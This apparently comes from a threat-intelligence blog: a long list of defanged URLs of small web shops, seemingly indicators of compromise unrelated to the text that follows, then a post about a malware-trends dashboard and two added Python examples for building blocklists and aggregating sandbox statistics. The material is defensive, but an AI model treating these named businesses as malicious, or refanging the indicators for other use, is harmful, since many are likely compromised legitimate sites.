      URL: http://www.]1quickcomp.]com/
      URL: http://pinul.]com/
      URL: http://www.]99materials.]com/
      URL: http://southernvapor.]com/
      URL: http://www.]pejenterprisesinc.]com/
      URL: http://www.]ejoyeeta.]com/
      URL: http://www.]retailsigningsolutions.]com/
      URL: http://www.]fyringe.]com/
      URL: http://www.]suninbox.]co.]uk/
      URL: http://www.]gohoyo.]com/
      URL: http://eveday.]com/
      URL: https://www.]el-taller.]pe/
      URL: https://www.]dazzstyle.]com/
      URL: http://montecitocaviar.]com/
      URL: http://www.]togotelecom.]ca/
      URL: http://swimresearch.]com/
      URL: https://eighteditions.]com/
      URL: https://srmall.]net/
      URL: https://hyperstrength.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://deltanineclothing.]com/
      URL: http://www.]storerab.]com/
      URL: http://floorzndoorz.]com/
      URL: http://4girlsaccessories.]com/
      URL: http://www.]cityflorist.]co.]in/
      URL: http://faithandflags.]com/
      URL: https://www.]theaugustco.]com/
      URL: http://francomotorsports.]com/
      URL: http://www.]reviewlista.]com/
      URL: http://www.]luckystarparty.]com/
      URL: http://www.]interprice.]mx/
      URL: http://www.]xxlgrip.]com/
      URL: http://avstamps.]com/
      URL: https://www.]baleyo.]com/
      URL: http://www.]905wood.]com/
      URL: https://www.]macroman.]in/
      URL: http://cuberra.]eu/
      URL: https://www.]velmo.]com/
      URL: https://wonderna.]com/
      URL: http://www.]spectrumlites.]co.]in/
      URL: http://kupi-present.]ru/
      URL: http://plumbedright.]com/
      URL: http://equibuy.]es/
      URL: https://www.]tec-heads.]com/
      URL: http://advancehealthproducts.]com.]au/
      URL: http://www.]inflatable-zone.]org/
      URL: https://dermagold.]sg/
      URL: http://www.]ibericos.]es/
      URL: http://worldstogether.]com/
      URL: http://www.]reflect-store.]com/
      URL: http://www.]kaajalsarees.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]benzin-im-blut.]com/
      URL: http://www.]ladago.]co.]uk/
      URL: http://clonadipet.]com.]br/
      URL: http://www.]louboutinuk.]co.]uk/
      URL: https://onestophairandbeauty.]ie/
      URL: http://www.]jensalwholesale.]com/
      URL: https://www.]chirobuddy.]net/
      URL: http://tile.]tilesandiego.]com/
      URL: https://morrio.]com/
      URL: http://cadresrobain.]fr/
      URL: http://www.]petzy.]com.]au/
      URL: http://www.]dysin.]com/
      URL: http://buyvipbaby.]com/login/
      URL: http://www.]olisano.]com/
      URL: http://www.]thevintagegrapes.]com/
      URL: http://www.]ludoville.]it/
      URL: http://zigoh.]com/
      URL: http://usacontainergroup.]com/
      URL: https://www.]clinicallearning.]com/index.]php/
      URL: http://www.]farmcraft.]at/
      URL: http://www.]poyood.]com/
      URL: http://euromigracija.]lt/
      URL: http://goofballstuff.]com/
      URL: https://www.]enlivenglobal.]com/
      URL: http://www.]turyagatea.]com/
      URL: http://creekfire.]com/
      URL: http://nowknow.]ch/
      URL: http://vkconline.]com/
      URL: https://trinitysurvival.]com/
      URL: http://www.]eboxim.]com/
      URL: http://www.]ilovedelfruito.]com/
      URL: http://www.]danatsouq.]com/
      URL: https://www.]callidae.]com/
      URL: https://www.]tramit.]it/
      URL: http://jjnc.]com.]hk/
      URL: http://shop.]taketime.]ch/
      URL: https://lacnehry.]sk/
      URL: https://ibercorte.]com/
      URL: http://www.]macmax.]com/uk/
      URL: http://www.]raquelrecargas.]com.]br/
      URL: http://www.]hotsca.]com/
      URL: http://www.]jarab.]london/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://start-finish.]ru/
      URL: http://www.]officiel.]it/
      URL: http://www.]isbbookstore.]com/
      URL: http://www.]krirob.]nu/
      URL: http://www.]eurekacosmetics.]com/
      URL: http://kupu.]es/
      URL: http://en.]lileauxbrocantes.]com/nouveautes.]html
      URL: http://girlsandpearls.]com/
      URL: https://www.]websun.]us/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://piese-gm.]ro/
      URL: http://www.]diamondsnyou.]com/
      URL: http://ccgobuy.]com/
      URL: http://olenobra.]com/
      URL: https://www.]eternis.]pt/
      URL: http://infcollection.]com/
      URL: http://lojamundodosgames.]com/
      URL: http://purplebluepublishing.]com/
      URL: https://www.]autowheelexperts.]com/
      URL: https://www.]gizell.]ro/
      URL: http://smalldogsdepot.]com/
      URL: http://www.]hessiansantasacks.]co.]uk/
      URL: http://laborisfarma.]pl/
      URL: http://fashionfromla.]com/
      URL: https://www.]sellsspares.]com/
      URL: http://www.]soothnshine.]com/
      URL: http://jacksvapes.]com/
      URL: https://www.]richgromart.]com/
      URL: http://www.]safetreksales.]com/
      URL: http://ibundo.]de/
      URL: http://www.]megamojster.]si/
      URL: http://rpkorea.]com/
      URL: http://discountadda.]com/
      URL: http://www.]enotecaosteriaroma.]it/
      URL: http://nopainnomusa.]com/
      URL: https://www.]shopforsaundarya.]com/
      URL: http://accessoriesdeluxe.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://www.]ghulamali.]com.]pk/
      URL: http://www.]hardshot.]fr/
      URL: http://countrystorecampinas.]com.]br/
      URL: http://p-d-r.]ru/
      URL: http://demo.]freelunchlabs.]com/
      URL: http://atopmall.]kr/
      URL: http://hurtsilvermagic.]pl/customer/account/login/
      URL: https://www.]afsr-simivalley-shop.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://produtosprofissionais.]com.]br/
      URL: https://my.]nutis.]com/
      URL: https://www.]smclinic.]bg/
      URL: https://www.]wisesolutions.]net/
      URL: https://davillblinds.]com/
      URL: https://minervamedical.]ca/
      URL: http://gamsjaga.]com/
      URL: https://jceracing.]com/
      URL: http://dhyanaa.]com/
      URL: https://weloveheipoa.]com/
      URL: http://www.]advanced-pixel-shuttle.]com/
      URL: http://allright.]dp.]ua/
      URL: http://trueitglobal.]com/
      URL: http://www.]nandndesign.]com/
      URL: http://antaraxnm.]com/
      URL: http://www.]petitkreativ.]at/
      URL: https://www.]crowngroup.]net.]au/shop/
      URL: http://vanquish.]co.]in/
      URL: http://www.]esde.]ro/
      URL: https://liquidlightglows.]com/
      URL: http://shop.]littleashford.]co.]za/
      URL: https://lens4us.]com/
      URL: https://www.]westernelitejewelry.]com/
      URL: http://www.]mobilprices.]com/
      URL: http://blitarzoneid.]blogspot.]com/
      URL: http://kraftitude.]com/
      URL: http://grupocyber.]net/
      URL: http://elektro-wols.]kompass-media.]eu/
      URL: http://classico.]nextmp.]net/
      URL: http://www.]nationaltiledistribution.]com/
      URL: http://bloomingtrails.]com/
      URL: http://redcellmedical.]com/
      URL: http://patesting.]ie/
      URL: http://www.]bysicilia.]it/
      URL: http://kibellariding.]com/
      URL: https://www.]ladoudounesolde.]com/
      URL: http://www.]anjelskedarceky.]sk/
      URL: https://poolstore.]com.]au/
      URL: http://sklepsilvermagic.]pl/
      URL: http://www.]uebuys.]com/
      URL: http://www.]reynsaon.]com/
      URL: http://eshop.]javwireless.]com/
      URL: http://alphafxtestbooster.]com/
      URL: https://decor-boutique.]com/
      URL: http://www.]kevinbuou.]com/
      URL: https://www.]aioma.]it/
      URL: http://luxuryjewelleryto.]com/
      URL: http://www.]angcoshop.]com/
      URL: https://www.]vayobv.]com/
      URL: http://de-lices.]ru/
      URL: https://democanopy.]com/
      URL: https://mustardoc.]com/
      URL: http://www.]gourmetgallery.]sk/
      URL: http://fetchscripts.]com/
      URL: http://ballcancersucks.]com/
      URL: https://xtremevisionhid.]com/
      URL: http://www.]brushncanvas.]com/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://www.]haitralled.]com/
      URL: https://hanarovendas.]com.]br/
      URL: http://www.]plasticrewards.]com/
      URL: http://www.]universalbumpkeys.]com/
      URL: http://zuzugadgets.]com/
      URL: https://freshyeat.]com/
      URL: http://alch.]it/
      URL: http://asap.]co.]in/
      URL: https://www.]majesticlightinginc.]com/
      URL: https://www.]1by1shop.]com/
      URL: https://www.]kitauto.]pt/
      URL: http://sandoggrus.]dk/
      URL: http://www.]shieldmans.]com/
      URL: http://zapal.]com.]ua/
      URL: https://www.]farmaciabovisa.]it/
      URL: http://gurmanebi.]com/
      URL: http://www.]sportlowcost.]it/
      URL: http://www.]minopuntomoda.]com/
      URL: http://mstech.]com.]au/
      URL: http://magegaga.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://shop-camera.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://alltradeshowdisplay.]com/
      URL: http://hikvision-ir.]com/
      URL: http://shop-camera.]com/
      URL: http://homelykart.]com/
      URL: https://www.]bvsecurity.]com/
      URL: http://mebli-z.]com/
      URL: https://mustardoc.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://www.]gramton.]com/
      URL: http://usacontainergroup.]com/
      URL: http://tile.]tilesandiego.]com/
      URL: http://bartonwest.]com/
      URL: https://www.]dazzstyle.]com/
      URL: https://minervamedical.]ca/
      URL: http://www.]inflatable-zone.]org/
      URL: http://www.]ilovedelfruito.]com/
      URL: http://www.]hotsca.]com/
      URL: http://www.]uebuys.]com/
      URL: http://girlsandpearls.]com/
      URL: http://obeikandl.]com/
      URL: http://thanhloc1.]com/
      URL: http://seasonallivingokc.]com/
      URL: https://www.]macroman.]in/
      URL: https://www.]petremedies.]co.]uk/
      URL: http://www.]hessiansantasacks.]co.]uk/
      URL: http://naturagladlife.]com/
      URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
      URL: https://commercialpoolandspasupplies.]com/
      URL: http://www.]sclabrine.]com/
      URL: http://www.]quimex.]com.]ar/
      URL: http://lojamundodosgames.]com/
      URL: http://om10.]ru/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://www.]suninbox.]co.]uk/
      URL: https://www.]vayobv.]com/
      URL: http://www.]louboutinuk.]co.]uk/
      URL: https://www.]ikonmotorsports.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]eternis.]pt/
      URL: http://www.]arquegym.]com.]br/
      URL: http://fetchscripts.]com/
      URL: http://petit-univers.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://ledrus.]co.]nz/
      URL: http://obeikandl.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://net-istore.]ro/
      URL: http://www.]mrsflorist.]co.]in/
      URL: http://shop-camera.]com/

      Cyber Threat Trends Dashboard

      Introduction

      Information sharing is one of the most important activities cybersecurity researchers perform on a daily basis. Thanks to these “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most infosharing in cybersecurity focuses on Indicators of Compromise (IoCs) such as URLs, IPs, domains and file hashes, which are well suited to arming protection tools such as proxies, next-generation firewalls and antivirus engines.
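As an added example (not code from the original post), the following Python turns a defanged indicator list in the `URL: …` style used above into a deduplicated hostname blocklist that a proxy or firewall can consume, keeping a count of how often each host recurs. The input text and its hostnames are constructed for the example; the refang rules cover the `.]` and URL-encoded `%5D` forms seen on this page plus the common `[.]` and `hxxp` conventions used by other feeds.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed sample in the page's defanged "URL: ..." style; the hostnames are
# made up and are not indicators from the list above.
SAMPLE_IOC_TEXT = """\
      URL: http://www.]shop-one.]example/
      URL: http://hotel-sample.]example/
      URL: http://hotel-sample.]example/
      URL: https://magesample.]example/
      URL: http://store.]shop-two.]example/index.%5Dphp?route=checkout/checkout
      URL: http://www.]shop-one.]example/
      Some unrelated line that carries no indicator
"""


def refang(url: str) -> str:
    """Undo defanging: the page's '.]' form, its URL-encoded '.%5D' variant, and
    the common '[.]' / 'hxxp' conventions used by other feeds."""
    url = unquote(url.strip())                       # '%5D' -> ']'
    url = url.replace("[.]", ".").replace(".]", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def parse_ioc_lines(text: str) -> list:
    """Return refanged URLs from every line of the form 'URL: <defanged url>'."""
    urls = []
    for line in text.splitlines():
        m = re.match(r"\s*URL:\s*(\S+)", line)
        if m:
            urls.append(refang(m.group(1)))
    return urls


def host_counts(text: str) -> Counter:
    """How many indicator lines reference each hostname (lower-cased).
    Repeats matter: a host listed many times was seen in many samples."""
    counts = Counter()
    for url in parse_ioc_lines(text):
        host = urlsplit(url).hostname
        if host:                                     # skip anything without a parsable host
            counts[host.lower()] += 1
    return counts


def blocklist(text: str) -> list:
    """Unique hostnames, most frequently referenced first, ties alphabetical."""
    counts = host_counts(text)
    return sorted(counts, key=lambda h: (-counts[h], h))


if __name__ == "__main__":
    # Leading dot is Squid's dstdomain syntax for "this host and all its subdomains".
    for host in blocklist(SAMPLE_IOC_TEXT):
        print(f".{host}")
```

The leading dot printed for each host follows Squid's `dstdomain` ACL convention (the host and all of its subdomains); adapt the output format to whatever enforcement point you feed, and review the list first, since a feed like the one above can also contain legitimate sites that were merely compromised.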

      Collecting and analyzing publicly available samples every single day, I became more and more interested in the evolution of cyber threats (cyber threat trends) rather than in single specific analyses, which, after hundreds of them, can get boring (no more emotion in analyzing the next ransomware or a new Emotet version 😛). APTs are another cup of tea (a lot of passion in understanding the next steps there). So I decided to develop a very simple dashboard showing, in near real time (as soon as my analyses are done), the threat trends observed over the days. The dashboard is available HERE (top menu TOOLS => Cyber Threat Trends). So far only a few basic pieces of information are shown; if you would like to see more stats/graphs/info, please feel free to contact me (HERE).

      Description

      The aim of this dashboard is to monitor trends over thousands, even millions, of samples, providing quantitative analyses of what has been observed during the automated analyses. The data in this dashboard is entirely auto-generated, without manual control and with no post-processing. You should consider it raw data from which to start your own research, applying your own filters or considerations. If you do, be aware that false positives could be just around the corner. Let’s move on to the current graphs and try to explain what I would like to show with them; before getting into them, you should be aware that all the digits on the graphs express percentages, not absolute numbers. Now let’s dig a little bit into them.

      • Malware Families Trends. Detection distribution over time: in other words, the time frames in which specific families are most active with respect to the others.
      • Malware Families. Automatic Yara rules classify samples into families. Many samples are not classified into a family: this happens when no signature matches the sample, or when multiple family signatures match the same sample. In both cases I am not sure which family the sample belongs to, so it is classified as “unknown” and not visualized on this graph. The missing slice of the pie is attributed to “unknown”.
      • Distribution Types. Based on the file’s magic bytes, this graph tracks the percentages of file types that malware used as carrier.
      • Threat Level Distribution. From 0 to 3, increasingly dangerous. It is also interesting to understand the threat level of the unknown families, to see whether malware or false positives are hiding in the unknown bucket. For this reason a dedicated graph named Unknown Families Threat Level Distribution has been created.
      • TOP Domains, TOP Processes and TOP File Names. With a sliding window over the last 300 analyzed samples, the backend extracts the most frequently contacted domains, spawned processes and used file names. Again, there is no filter and no post-processing on these fields, meaning you could well find “google.com” or “microsoft update” as the TOP domain, which is fine: if the sample queried them before performing its malicious actions, that is simply recorded and brought to your attention. Same cup of tea with processes and file names. Indeed, those fields include the term “involved” in their title: if something is involved, it does not mean that it is malicious, but that it was part of a malicious chain.
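The following Python, an added example rather than the dashboard's backend, implements the aggregations the bullets above describe over a handful of constructed per-sample records: the one-match-or-unknown family rule, the magic-byte carrier classification, the percentage graphs (including the unknown-only threat level view) and the sliding-window TOP lists. The record field names, the magic-byte table and the choice to count a domain, process or file name once per sample are assumptions of the example, not details of the real pipeline.

```python
from collections import Counter, defaultdict

# Constructed analysis records, one per sample, of the kind a sandbox + Yara
# pipeline might emit. Field names are assumptions, not the dashboard's schema.
SAMPLES = [
    {"day": "2020-08-01", "family_matches": ["emotet"], "magic": b"MZ\x90\x00\x03", "threat_level": 3,
     "domains": ["update.microsoft.com", "c2-one.example"], "processes": ["cmd.exe", "powershell.exe"],
     "file_names": ["invoice.doc"]},
    {"day": "2020-08-01", "family_matches": ["emotet"], "magic": b"\xd0\xcf\x11\xe0\xa1\xb1", "threat_level": 2,
     "domains": ["c2-one.example"], "processes": ["winword.exe", "powershell.exe"], "file_names": ["invoice.doc"]},
    {"day": "2020-08-01", "family_matches": [], "magic": b"MZ\x90\x00", "threat_level": 1,          # no Yara hit
     "domains": ["update.microsoft.com"], "processes": ["cmd.exe"], "file_names": ["setup.exe"]},
    {"day": "2020-08-02", "family_matches": ["ryuk", "emotet"], "magic": b"MZ", "threat_level": 3,   # two hits
     "domains": ["c2-two.example"], "processes": ["vssadmin.exe", "cmd.exe"], "file_names": ["ryuk.exe"]},
    {"day": "2020-08-02", "family_matches": ["agenttesla"], "magic": b"PK\x03\x04", "threat_level": 2,
     "domains": ["smtp.mail.example"], "processes": ["regasm.exe"], "file_names": ["order.xlsx"]},
    {"day": "2020-08-02", "family_matches": [], "magic": b"%PDF-1.7", "threat_level": 0,
     "domains": [], "processes": ["acrord32.exe"], "file_names": ["brochure.pdf"]},
]

# Well-known magic-byte prefixes -> carrier type label used on the graph (assumed table).
MAGIC_TYPES = [
    (b"MZ", "PE"), (b"\x7fELF", "ELF"), (b"%PDF", "PDF"), (b"PK\x03\x04", "ZIP/OOXML"),
    (b"\xd0\xcf\x11\xe0", "OLE2/Office"), (b"Rar!", "RAR"),
]


def classify_family(matches):
    """Exactly one matching family rule is required; zero or several -> 'unknown'."""
    return matches[0] if len(matches) == 1 else "unknown"


def file_type(magic):
    """Classify a carrier by its leading bytes; anything unrecognised is 'other'."""
    for prefix, label in MAGIC_TYPES:
        if magic.startswith(prefix):
            return label
    return "other"


def percentages(counter):
    """Turn counts into percentages of the total (one decimal), as the graphs do."""
    total = sum(counter.values())
    return {k: round(100.0 * v / total, 1) for k, v in counter.items()} if total else {}


def family_distribution(samples):
    """Share of all samples per known family. 'unknown' is counted in the total
    but not returned, so the slices shown sum to less than 100: the gap is unknown."""
    pct = percentages(Counter(classify_family(s["family_matches"]) for s in samples))
    pct.pop("unknown", None)
    return pct


def family_trend(samples):
    """Per-day family share: which families dominate in which time frame."""
    by_day = defaultdict(Counter)
    for s in samples:
        by_day[s["day"]][classify_family(s["family_matches"])] += 1
    return {day: percentages(c) for day, c in sorted(by_day.items())}


def type_distribution(samples):
    """Share of each carrier file type across all samples."""
    return percentages(Counter(file_type(s["magic"]) for s in samples))


def threat_level_distribution(samples, unknown_only=False):
    """Level 0..3 share; with unknown_only=True it is the 'Unknown Families' variant,
    which shows whether the unclassified bucket hides real malware or false positives."""
    chosen = [s for s in samples
              if not unknown_only or classify_family(s["family_matches"]) == "unknown"]
    return percentages(Counter(s["threat_level"] for s in chosen))


def top_involved(samples, field, window=300, n=3):
    """Most frequent values of `field` over a sliding window of the last `window`
    analyses. Nothing is filtered, so benign names such as update.microsoft.com
    show up whenever samples touched them; each name counts once per sample."""
    counts = Counter()
    for s in samples[-window:]:
        counts.update(set(s[field]))
    return counts.most_common(n)


if __name__ == "__main__":
    print("families:", family_distribution(SAMPLES))
    print("trend:", family_trend(SAMPLES))
    print("types:", type_distribution(SAMPLES))
    print("levels (all):", threat_level_distribution(SAMPLES))
    print("levels (unknown):", threat_level_distribution(SAMPLES, unknown_only=True))
    for field in ("domains", "processes", "file_names"):
        print(f"top {field}:", top_involved(SAMPLES, field))
```

Run as a script it prints each graph's data for the six constructed records; note how the family pie sums to 50 % because the two zero-match samples and the double-match sample all land in the unplotted “unknown” slice, and how `update.microsoft.com` ties for the top domain even though it is benign, exactly the “involved, not necessarily malicious” caveat above.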

      Conclusion

      The introduced dashboard is part of my contribution to the cybersecurity community, like every free tool released in the “Tools” menu. Cyber Threat Trends evolves dynamically over time, and you might find it useful for asking questions about live statistics on cybersecurity threats. If you are a journalist or a cybersec enthusiast you might find there some answers to trending questions, to be elaborated over time.